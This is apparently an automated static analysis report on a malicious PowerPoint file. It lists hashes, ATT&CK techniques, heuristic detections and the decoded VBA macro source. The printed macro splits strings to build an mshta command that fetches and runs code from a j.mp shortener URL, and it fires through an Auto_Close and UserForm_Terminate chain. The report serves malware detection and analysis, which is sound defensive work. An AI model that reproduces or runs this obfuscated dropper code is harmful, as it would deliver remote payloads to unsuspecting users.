Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 0d838d8636a88e63…

MALICIOUS

Office (OLE) / .PPT

Size: 75.5 KB
Created: 2020-11-19 22:03:29
Authoring application: Microsoft Office PowerPoint
First seen: 2026-05-13
MD5: c58976da0ef0f00fa982bc6ce01809c0
SHA-1: e97289611ed14768b9875c3425f2a4a25b19b7cd
SHA-256: 0d838d8636a88e63e0a6ed863f1bc32e5a95d8b835cc509a497dfb15fd540f82
Risk Score: 130

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains VBA macros, including an Auto_Close macro, which is a common technique for executing malicious code upon document closure. The script constructs a URL by concatenating string literals and uses the Shell function to execute it, likely downloading and running a second-stage payload. The constructed URL is http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd.

Heuristics 5

  • VBA macros detected (severity: medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical) OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script: Shell maviya1
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) (severity: high) OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • Auto_Close macro (severity: low) OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script: AUtO_ClOsE()
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd (referenced by macro)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1503 bytes
SHA-256: 8345cb22770a79cfb36baa20e5983998d66f1c375ae793e1d67be6751191eb2d
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "sexy"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit

Sub hhhhh()

lol.Show

End Sub



Attribute VB_Name = "tutulpiii"
Function maviya1() As String

maviya2 = "m"


maviya1 = maviya2 + maviya3 + lahab
End Function

Attribute VB_Name = "hithithit"
Function maviya3()
yadeez1 = "s"
yadeez2 = "h"
yadeez3 = "t" + "a h" + "t"

maviya3 = yadeez1 + yadeez2 + yadeez3
End Function


Attribute VB_Name = "hullll"
Option Explicit

Sub _
AUtO_ClOsE()

Dim kasdok As sexy
Set kasdok = New sexy
With kasdok
End With

kasdok.hhhhh

End Sub

Attribute VB_Name = "lol"
Attribute VB_Base = "0{0912433B-95BC-45DF-8D58-BFA9C146EEFA}{C20D8037-E631-47F8-B93A-0DA16545D457}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Option Explicit
Private Sub UserForm_Terminate()
Shell maviya1
End Sub


Attribute VB_Name = "putter"

Function lahab() As String



lahab1 = "tp://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/"


lahab2 = "djka" + "aah" + "dasdhkasj" + "asdhksdb" + "hd"


lahab = lahab1 + lahab2
End Function